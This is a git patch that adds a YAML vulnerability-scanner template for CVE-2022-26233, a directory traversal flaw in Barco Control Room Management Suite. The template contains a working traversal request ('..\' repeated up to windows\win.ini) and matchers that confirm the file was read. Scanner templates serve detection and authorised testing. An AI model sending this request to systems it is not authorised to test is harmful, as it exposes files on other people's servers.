From 67b4c3b0aa83af5b02b4729a00786e78a65135d7 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Thu, 5 May 2022 10:55:44 +0900
Subject: [PATCH] Create CVE-2022-26233.yaml

---
 CVE-2022-26233.yaml | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 CVE-2022-26233.yaml

diff --git a/CVE-2022-26233.yaml b/CVE-2022-26233.yaml
new file mode 100644
index 0000000000..05f00cd433
--- /dev/null
+++ b/CVE-2022-26233.yaml
@@ -0,0 +1,31 @@
+id: CVE-2022-26233
+
+info:
+  name: Barco Control Room Management Suite - Directory Traversal
+  author: 0x_Akoko
+  severity: high
+  description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
+  reference:
+    - https://0day.today/exploit/37579
+    - https://www.cvedetails.com/cve/CVE-2022-26233
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-26233
+    cwe-id: CWE-22
+  tags: cve,cve2022,barco,lfi
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/..\..\..\..\..\..\..\..\..\..\windows\win.ini'
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and